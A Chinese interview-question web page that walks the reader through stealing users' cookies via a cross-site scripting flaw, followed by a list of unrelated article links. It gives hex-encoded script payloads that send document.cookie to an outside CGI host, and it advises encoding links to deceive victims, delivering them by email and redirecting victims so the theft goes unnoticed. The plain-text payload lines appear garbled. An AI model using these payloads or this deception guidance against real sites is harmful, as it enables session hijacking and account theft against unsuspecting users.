能否解释一下XSS cookie盗窃是什么意思


Posted in 面试题 onJune 02, 2012
根据作为攻击对象的Web程序,下面某些变量和插入位置可能需要进行调整。要注意这只是攻击方法的一个例子。在这个例子中,我们将利用脚本“a.php”中的 “viriable”变量中的跨站脚本漏洞,通过正常请求进行攻击。这是跨站脚本攻击最常见的形式。
第一步: 锁定目标

当你找到某个Web程序存在XSS漏洞之后,检查一下它是否设置了cookie。如果在该网站的任何地方设置了cookie,那么就可以从用户那里盗取它。
第二步: 测试

不同的攻击方式将产生不同的XSS漏洞,所以应适当进行测试以使得输出结果看起来像是正常的。某些恶意脚本插入之后会破坏输出的页面。(为欺骗用户,输出结果非常重要,因此攻击者有必要调整攻击代码使输出看起来正常。)

下一步你需要在链接至包含XSS漏洞的页面的URL中插入 Javascript(或其他客户端脚本)。下面列出了一些经常用于测试XSS漏洞的链接。当用户点击这些链接时,用户的cookie奖被发送到 www.cgisecurity.com/cgi-bin/cookie.cgi 并被显示。如果你看到显示结果中包含了cookie信息,说明可能可以劫持该用户的账户。

盗取Cookie的Javascript示例。使用方法如下。

ASCII用法

http://host/a.php?variable=”>

十六进制用法

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f

%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

注意: 每种用法都先写为ASCII,再写成十六进制以便复制粘贴。

1. “>

HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65
%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f
%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

2.

HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72
%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b
%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e

3. >

HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c
%6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75
%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f
%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e

第三步: 执行XSS

将做好的URL通过电子邮件或其他方式发送出去。注意如果你直接将URL发送给其他人(通过电子邮件、即时通讯软件或其他方式),你应当将其进行十六进制编码,因为这些URL一眼便可看出包含恶意代码,但经过十六进制编码之后就可以欺骗大部分人。
第四步: 处理收集到的信息

一旦用户点击了你的URL,相应数据就会被发送到你的CGI脚本中。这样你就获得了 cookie信息,然后你可以利用Websleuth之类的工具来检查是否能盗取那个账户。

在上面的例子中,我们仅仅将用户带到了 cookie.cgi页面上。如果你有时间,你可以在CGI中将用户重定向到原来的页面上,即可在用户不知不觉之中盗取信息。

某些电子邮件程序在打开附件时会自动执行附件中的Javascript代码。即使像Hotmail这样的大型网站也是如此,不过它对附件内容作了许多过滤以避免cookie被盗。

Tags in this post...

面试题 相关文章推荐
经典c++面试题四
May 14 面试题
Oracle快照(snapshot)
Mar 13 面试题
介绍一下SQL Server的全文索引
Aug 15 面试题
程序员机试试题汇总
Mar 07 面试题
.NET面试问题集
Dec 08 面试题
.net C#面试题
Aug 28 面试题
C#中有没有运算符重载?能否使用指针?
May 05 面试题
中科创达面试题
Dec 28 面试题
为什么要用EJB
Apr 17 面试题
在浏览器端如何得到服务器端响应的XML数据
Nov 24 面试题
一道输出判断型Java面试题
Oct 01 面试题
有abstract方法的类一定要用abstract修饰吗
Mar 14 面试题
什么是跨站脚本攻击
Dec 11 #面试题
金士达面试非笔试
Mar 14 #面试题
傲盾软件面试题
Aug 17 #面试题
网络安全类面试题
Aug 01 #面试题
如何保障Web服务器安全
May 05 #面试题
介绍一下如何利用路径遍历进行攻击及如何防范
Jan 19 #面试题
SQL注入攻击的种类有哪些
Dec 30 #面试题
You might like
php中函数的形参与实参的问题说明
2010/09/01 PHP
php使用正则过滤js脚本代码实例
2014/05/10 PHP
linux下安装php的memcached客户端
2014/08/03 PHP
php中strtotime函数用法详解
2014/11/15 PHP
46 个非常有用的 PHP 代码片段
2016/02/16 PHP
PHP结合jquery ajax实现上传多张图片,并限制图片大小操作示例
2019/03/01 PHP
PHP开发实现快递查询功能详解
2019/04/08 PHP
Laravel中如何轻松容易的输出完整的SQL语句
2020/07/26 PHP
Javascript玩转继承(二)
2014/05/08 Javascript
nodejs下打包模块archiver详解
2014/12/03 NodeJs
js判断文本框剩余可输入字数的方法
2015/02/04 Javascript
js跨域请求的5中解决方式
2015/07/02 Javascript
JQuery入门基础小实例(1)
2015/09/17 Javascript
Bootstrap富文本组件wysiwyg数据保存到mysql的方法
2016/05/09 Javascript
vue.js实现含搜索的多种复选框(附源码)
2017/03/23 Javascript
详谈js遍历集合(Array,Map,Set)
2017/04/06 Javascript
Vue.js在使用中的一些注意知识点
2017/04/29 Javascript
JavaScript高阶教程之“==”隐藏下的类型转换
2019/04/11 Javascript
vue 点击其他区域关闭自定义div操作
2020/07/17 Javascript
[01:45]亚洲邀请赛互动指南虚拟物品介绍
2015/01/30 DOTA
[02:26]2018DOTA2亚洲邀请赛赛前采访-Newbee篇
2018/04/03 DOTA
[50:38]DOTA2-DPC中国联赛 正赛 Phoenix vs CDEC BO3 第二场 3月7日
2021/03/11 DOTA
用Python实现一个简单的线程池
2015/04/07 Python
基于Python的XSS测试工具XSStrike使用方法
2017/07/29 Python
Python的SimpleHTTPServer模块用处及使用方法简介
2018/01/22 Python
python 叠加等边三角形的绘制的实现
2019/08/14 Python
python使用协程实现并发操作的方法详解
2019/12/27 Python
matplotlib 生成的图像中无法显示中文字符的解决方法
2020/06/10 Python
python中pop()函数的语法与实例
2020/12/01 Python
Bose美国官网:购买Bose耳机和音箱
2019/03/10 全球购物
罗马尼亚在线杂货店:Pilulka.ro
2019/09/28 全球购物
出国留学经济担保书
2014/04/01 职场文书
公司新年寄语
2014/04/04 职场文书
全国文明单位申报材料
2014/05/31 职场文书
信用卡逾期证明示例
2014/09/13 职场文书
政工师工作总结2015
2015/05/26 职场文书